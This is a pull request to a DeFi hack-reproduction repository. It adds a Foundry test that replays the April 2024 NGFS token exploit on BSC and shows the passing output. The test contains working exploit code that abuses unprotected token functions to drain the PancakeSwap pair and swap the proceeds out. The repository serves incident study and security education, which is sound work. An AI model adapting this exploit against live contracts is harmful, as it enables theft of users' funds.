### PR TITLE
Feat: add ngfs token attack

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-394 incidents included.
+395 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 

--- a/README.md
+++ b/README.md
@@ -34,6 +34,7 @@ All articles are also published on [Substack](https://defihacklabs.substack.com/
 - Lesson 7: Hack Analysis: Nomad Bridge, August 2022 ( [English](https://github.com/SunWeb3Sec/DeFiHackLabs/tree/main/academy/onchain_debug/07_Analysis_nomad_bridge/en/) | [中文](https://github.com/SunWeb3Sec/DeFiHackLabs/tree/main/academy/onchain_debug/07_Analysis_nomad_bridge/) )
 
 ## List of Past DeFi Incidents
+[20240425 NGFS](#20240425-ngfs---bad-access-control)
 [20240424 XBridge](#20240424-xbridge---logic-flaw)
 
 [20240424 YIEDL](#20240424-yiedl---input-validation)
@@ -864,6 +865,25 @@ All articles are also published on [Substack](https://defihacklabs.substack.com/
 
 ### Lost: >200k USD(plus a lot of STC, SRLTY, Mazi tokens)
 
+
+
+
+
+### 20240425 NGFS - Bad Access Control
+
+### Lost: ~190K
+
+
+```sh
+forge test --contracts ./src/test/NGFS_exp.sol -vvv
+```
+#### Contract
+[NGFS_exp.sol](src/test/NGFS_exp.sol)
+### Link reference
+
+https://twitter.com/CertiKAlert/status/1783476515331616847
+
+---
 ```sh
 forge test --contracts ./src/test/XBridge_exp.sol -vvv
 ```

--- a/src/test/NGFS_exp.sol
+++ b/src/test/NGFS_exp.sol
@@ -13,7 +13,7 @@ import "forge-std/Test.sol";
 // Vulnerable Contract Code : https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a#code
 
 // @Analysis
-// Post-mortem : 
+// Post-mortem : https://louistsai.vercel.app/p/2024-04-25-ngfs-exploit/
 // Twitter Guy : https://twitter.com/CertiKAlert/status/1783476515331616847
 // Hacking God : 
 

--- a/src/test/NGFS_exp.sol
+++ b/src/test/NGFS_exp.sol
@@ -1,0 +1,80 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "forge-std/Test.sol";
+
+// @KeyInfo - Total Lost : ~190K
+// Attacker : https://bscscan.com/address/0xd03d360dfc1dac7935e114d564a088077e6754a0
+// Attack Contract : https://bscscan.com/address/0xc73781107d086754314f7720ca14ab8c5ad035e4
+// Vulnerable Contract : https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a
+// Attack Tx : https://bscscan.com/tx/0x8ff764dde572928c353716358e271638fa05af54be69f043df72ad9ad054de25
+
+// @Info
+// Vulnerable Contract Code : https://bscscan.com/address/0xa608985f5b40cdf6862bec775207f84280a91e3a#code
+
+// @Analysis
+// Post-mortem : 
+// Twitter Guy : https://twitter.com/CertiKAlert/status/1783476515331616847
+// Hacking God : 
+
+interface IPancakeFactory {
+    function getPair(address, address) external returns(address);
+}
+
+interface IPancakeRouter {
+    function swapExactTokensForTokensSupportingFeeOnTransferTokens(
+        uint amountIn,
+        uint amountOutMin,
+        address[] calldata path,
+        address to,
+        uint deadline
+    ) external;
+}
+
+interface INGFSToken {
+    function delegateCallReserves() external;
+    function setProxySync(address) external;
+    function balanceOf(address) external view returns (uint256);
+    function reserveMultiSync(address, uint256) external;
+    function approve(address, uint256) external returns (bool);
+
+}
+
+interface IBEP20 {
+    function balanceOf(address) external view returns (uint256);
+}
+
+contract NGFS is Test {
+    uint256 blocknumToForkFrom = 38_167_372;
+    address constant PancakeFactory = 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73;
+    address constant PancakeRouter = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
+    address constant NGFSToken = 0xa608985f5b40CDf6862bEC775207f84280a91E3A;
+    address constant BSCToken = 0x55d398326f99059fF775485246999027B3197955;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", blocknumToForkFrom);
+    }
+
+    function testExploit() public {
+        // Implement exploit code here
+        uint256 tokenBalanceBefore = IBEP20(BSCToken).balanceOf(address(this));
+        console.log("BSC Token Balance Before Attack %s", tokenBalanceBefore);
+        address pair = IPancakeFactory(PancakeFactory).getPair(NGFSToken, BSCToken);
+        INGFSToken(NGFSToken).delegateCallReserves();
+        INGFSToken(NGFSToken).setProxySync(address(this));
+        uint256 balance = INGFSToken(NGFSToken).balanceOf(pair);
+        INGFSToken(NGFSToken).reserveMultiSync(address(this), balance);
+        INGFSToken(NGFSToken).approve(PancakeRouter, type(uint256).max);
+        uint256 amount = INGFSToken(NGFSToken).balanceOf(address(this));
+        address[] memory path = new address[](2);
+        path[0] = NGFSToken;
+        path[1] = BSCToken;
+        uint256 deadline = 1_714_043_885;
+        IPancakeRouter(PancakeRouter).swapExactTokensForTokensSupportingFeeOnTransferTokens(amount, 0, path, address(this), deadline);
+
+        // Log balances after exploit
+        uint256 tokenBalanceAfter = IBEP20(BSCToken).balanceOf(address(this));
+        console.log("BSC Token Balance Before Attack %s", tokenBalanceAfter);
+        console.log("Attack Earned %s BSC Token", tokenBalanceAfter - tokenBalanceBefore);
+    }
+}


### PR DESCRIPTION
Command: `forge test --contracts src/test/NGFS_exp.sol --evm-version "shanghai" -vvv`

If I remove the `--evm-version` flag, it would have some technical issue and show `EvmError: NotActivated` error.

The result is as follows:

```
[PASS] testExploit() (gas: 206712)
Logs:
  BSC Token Balance Before Attack 26542161622221038197
  BSC Token Balance Before Attack 95928819345721389506858
  Attack Earned 95902277184099168468661 BSC Token

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 896.76ms (1.53ms CPU time
```